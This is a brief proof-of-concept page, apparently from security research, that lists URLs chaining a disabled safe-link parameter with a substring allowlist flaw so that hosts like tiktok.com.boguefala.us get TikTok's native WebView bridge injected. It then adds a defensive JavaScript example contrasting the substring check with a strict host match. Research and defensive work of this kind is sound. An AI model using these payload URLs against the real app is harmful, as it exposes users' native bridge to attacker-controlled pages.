SCC bypass → bridge chain — lrd0036
CONFIRMED: enable_securelink=0 loads arbitrary URLs past the safety gate.
Now chaining the p_checkURLInAllowDomain substring flaw (host contains an allowlisted
token) to get the native bridge injected. WIN = red page renders AND its
webkit.messageHandlers box is non-empty.
1 · confirmed SCC bypass (baseline — should load, bridge likely empty)
boguefala.us/poc &enable_securelink=0
2 · FULL CHAIN — SCC off + host-substring for bridge injection
tiktok.com.boguefala.us/poc &enable_securelink=0
…tiktok.com.boguefala.us + param both places
3 · other allowlist tokens (if tiktok.com isn't the allowlisted one)
tiktokv.com.boguefala.us/poc &enable_securelink=0
webcast.tiktok.com.boguefala.us/poc &enable_securelink=0
4 · Safari controls
tiktok.com.boguefala.us/poc in Safari
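
A defender-side view of the host check this page tests, as an added example that is not code from the page or from the app: a substring match of the kind described above, next to a strict match that rejects the same hosts. The allowlist contents and all function names are assumptions; the real p_checkURLInAllowDomain implementation is not shown on the page.

```javascript
// Added example. ALLOWED_DOMAINS is a hypothetical allowlist built from the
// tokens this page guesses at; the app's real list is not on the page.
const ALLOWED_DOMAINS = ["tiktok.com", "tiktokv.com"];

// Flawed form: the behaviour the page describes (host *contains* a token).
function hostAllowedSubstring(rawUrl) {
  const host = new URL(rawUrl).hostname;
  return ALLOWED_DOMAINS.some((d) => host.includes(d));
}

// Hardened form: https only, no userinfo, exact host or dot-delimited subdomain.
function hostAllowedStrict(rawUrl) {
  let u;
  try {
    u = new URL(rawUrl);
  } catch {
    return false; // unparseable input never gets the bridge
  }
  if (u.protocol !== "https:" || u.username || u.password) return false;
  const host = u.hostname.toLowerCase().replace(/\.$/, ""); // drop trailing root dot
  // "." + d enforces a label boundary, so "<prefix>tiktok.com" does not match.
  return ALLOWED_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

// Constructed sample URLs: hosts from this page plus first-party controls.
const SAMPLES = [
  "https://www.tiktok.com/poc",
  "https://webcast.tiktok.com/poc",
  "https://tiktok.com.boguefala.us/poc",
  "https://tiktokv.com.boguefala.us/poc",
  "https://boguefala.us/poc",
  "https://nottiktok.com/poc", // constructed: missing label boundary
];

// Returns one row per URL with the verdict of each check.
function compare(urls) {
  return urls.map((url) => ({
    url,
    substring: hostAllowedSubstring(url),
    strict: hostAllowedStrict(url),
  }));
}

console.table(compare(SAMPLES));
```

The strict check only holds if the parser used for it is the same one that produces the URL the WebView actually loads; two parsers can disagree about which part is the host.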